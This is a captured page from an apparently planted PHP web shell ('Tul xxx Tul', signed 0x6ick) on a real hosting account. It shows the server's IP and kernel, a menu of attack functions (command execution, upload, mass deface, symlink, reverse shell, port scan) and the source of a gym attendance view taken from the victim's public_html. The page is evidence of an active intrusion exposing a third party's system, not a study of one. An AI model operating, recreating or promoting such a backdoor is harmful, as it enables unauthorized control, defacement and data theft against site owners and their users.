Tul xxx Tul
User / IP
:
216.73.216.191
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
gimnasiofitnes
/
app
/
Views
/
admin
/
attendance
/
Viewing: index_.php
<?= $this->extend('layout/app'); ?> <?php $this->section('title'); ?> Asistencia <?php $this->endSection(); ?> <?php $this->section('css'); ?> <link rel="stylesheet" href="<?= base_url('assets/DataTables/datatables.min.css'); ?>"> <?php $this->endSection(); ?> <?php $this->section('content'); ?> <div class="app-title"> <div> <h1><i class="bi bi-clipboard-check"></i> Asistencia</h1> <p>Listado de Asistencia</p> </div> <ul class="app-breadcrumb breadcrumb"> <li class="breadcrumb-item"><i class="bi bi-house-door fs-6"></i></li> <li class="breadcrumb-item"><a href="<?= base_url('admin'); ?>">Admin</a></li> <li class="breadcrumb-item"><a href="#">Asistencia</a></li> </ul> </div> <div class="card"> <div class="card-body"> <h2 class="card-title">Semana: <?= date('d/m/Y', strtotime($weekStart)) ?> - <?= date('d/m/Y', strtotime($weekEnd)) ?></h2> <hr> <div class="d-flex justify-content-between mb-3"> <a class="btn btn-primary" href="<?= base_url('admin/attendance/new'); ?>">Nuevo Registro</a> <div class="btn-group" role="group"> <a href="?week=<?= date('Y-m-d', strtotime($weekStart . ' -7 days')) ?>" class="btn btn-danger">Anterior</a> <a href="?week=<?= date('Y-m-d', strtotime($weekStart . ' +7 days')) ?>" class="btn btn-primary">Siguiente</a> </div> </div> <table class="table table-bordered text-center align-middle" id="tblAttendance"> <?php $formatter = new IntlDateFormatter( 'es_ES', IntlDateFormatter::FULL, IntlDateFormatter::NONE, 'Europe/Madrid', IntlDateFormatter::GREGORIAN, "EEEE d 'de' MMMM 'de' Y" ); ?> <thead class="table-info"> <tr> <th>NOMBRES</th> <?php for ($i = 0; $i < 7; $i++): ?> <?php $date = strtotime("$weekStart +$i days"); echo "<th>" . ucfirst($formatter->format($date)) . "</th>"; ?> <?php endfor; ?> </tr> </thead> <tbody> <?php foreach ($users as $user): ?> <tr> <td class="fw-bold"><?= $user['name'] ?></td> <?php for ($i = 0; $i < 7; $i++): $date = date('Y-m-d', strtotime("$weekStart +$i days")); ?> <td><?= $attendance[$user['id']][$date] ?? 'NO' ?></td> <?php endfor; ?> </tr> <?php endforeach; ?> </tbody> </table> <?php if (session()->getFlashdata('message')) { ?> <div class="alert alert-success border-0 bg-success alert-dismissible fade show py-2"> <div class="d-flex align-items-center"> <div class="font-35 text-white"><i class='bx bxs-check-circle'></i></div> <div class="ms-3"> <h6 class="mb-0 text-white">Respuesta</h6> <div class="text-white"><?= session()->getFlashdata('message'); ?></div> </div> </div> <button type="button" class="btn-close" data-bs-dismiss="alert"></button> </div> <?php } ?> </div> </div> <?php $this->endSection(); ?> <?php $this->section('js'); ?> <script src="<?= base_url('assets/DataTables/datatables.min.js'); ?>"></script> <script> document.addEventListener('DOMContentLoaded', function() { $('#tblAttendance').DataTable({ language: { url: base_url + 'assets/admin/js/es-ES.json', }, dom, buttons, }); }); </script> <?php $this->endSection(); ?>
Coded With 💗 by
0x6ick